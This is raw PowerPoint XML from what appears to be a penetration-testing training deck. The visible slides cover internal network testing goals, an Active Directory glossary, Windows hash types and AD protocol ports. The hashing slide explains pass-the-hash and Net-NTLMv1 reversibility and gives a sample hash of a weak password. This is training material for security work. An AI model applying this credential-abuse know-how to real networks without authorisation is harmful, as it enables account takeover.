          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3158508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Precursor &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Internal Network Penetration Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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545529"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>What? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Testing the security posture of the internal networks of the target organization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Why? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Strong external/perimeter security – Great!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Unknown internal network security – Not great.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>  Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>"Let's assume that the attackers are inside. What now?"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Finding misconfigurations (and vulnerabilities)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Layered defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6" descr="Architecture Case Study – Part 1 | Nige the Security Guy">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4E2552-D361-5520-A53E-3F7BEC365F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5863805" y="1420015"/>
            <a:ext cx="3055906" cy="2095896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181285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6A597B-86C1-4FD3-0F5F-931B657D2585}"/>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DAB9667F-8D65-CFC4-7397-EB0220FAC582}"/>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7" name="Picture 6" descr="SOUP.wmv - YouTubeasdf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB068E4-09BC-6F84-C7C2-EDDE5310F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950" y="227169"/>
            <a:ext cx="6038187" cy="45235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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A0D6A1-C445-B1A2-61FB-A9344988BBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2202148" y="1011685"/>
            <a:ext cx="860137" cy="307777"/>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1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>RTV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F2E294-4F23-4BE8-3CEF-6358A7F49D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4899309" y="2225738"/>
            <a:ext cx="2796885" cy="307777"/>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400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
              <a:t>Choi &amp; Scott &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
              <a:t>shikata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="IBM Plex Sans" charset="0"/>
              <a:cs typeface="IBM Plex Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379E3518-1398-5B5F-3C32-E76791EB218C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803833" y="2812483"/>
            <a:ext cx="909841" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
              <a:t>Alphabet Soup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233098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Active Directory Lexicon</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4053799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This is by NO means comprehensive Active Directory at all, just what is needed for this training.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Forest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = Logical collection of AD domain(s). Shares Schema, Global Catalog, Configurations, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = Logical grouping of resources (user, machine, OUs, Containers, etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= Server that handles security authentication requests within a domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = Accounts within the domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = Groups of users. Groups can be used to delegate permissions to multiple users rather than having to give each user permission. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"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a:rPr>
              <a:t>Domain User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= Authenticates to the domain controller rather than the computer itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Local User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= Authenticates to the local computer rather than the domain controller.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3331256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Active Directory &gt; AD Objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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dirty="0" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3" descr="https://www.pcwdld.com/wp-content/uploads/Domain-Forest-1024x472.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE31EC01-2C8C-8273-AB04-2B17B3FED2B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="995219" y="946619"/>
            <a:ext cx="6749470" cy="3111715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3" descr="https://www.conceptdraw.com/How-To-Guide/picture/active-directory-diagram4.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8E18B4-59DC-4DA7-8486-ADDC35EBFD03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="591127" y="652079"/>
            <a:ext cx="7955971" cy="3995204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03953E3C-398B-15DF-8690-572393549AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5548045" y="4812800"/>
            <a:ext cx="335964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dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>https://www.conceptdraw.com/examples/active-directory-structure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="IBM Plex Sans"/>
              <a:ea typeface="IBM Plex Sans" charset="0"/>
              <a:cs typeface="IBM Plex Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3026517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Precursor &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Windows Password Hashing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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637991" cy="2831208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Windows Hashing Algorithms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>LM Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= Lanman hashes, turned off by default in Windows Vista and Server 2008, VERY WEAK. Can be cracked instantly. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>aad3b435b51404eeaad3b435b51404ee </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>NT Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = Can be used for pass the hash, just as good as a password to windows. Don't need to crack this hash to use it for authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>The following password hash represents the string : Summer2022</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>a3d7d25665f1146b56192b850fd57a93</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>NTLM Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= LM hash + NT hash, concatenated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>aad3b435b51404eeaad3b435b51404ee:a3d7d25665f1146b56192b850fd57a93</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Net-NTLMv1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = This should be turned off on every domain, however it is NOT. This was the first implementation of Net-NTLM, however it is cryptographically reversible to NTLM (thanks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>evilmog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> for writing a tool to do this ❤), making it just as useful as an NTLM password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Net-NTLMv2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = The standard today, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>crackable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="45720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lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370928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Active Directory Key Protocols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r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= P:53 - Translates Domain Names to IP addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DHCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= Assigns IP addresses to machines dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>= P:389/636 - Protocol used to access Active Directory information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SMB/Samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> = P:445 - Windows Filesharing protocol, highly active in corporate networks, can be used to run commands and access a machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>RDP </a:t>
            </a:r>
            <a:r>
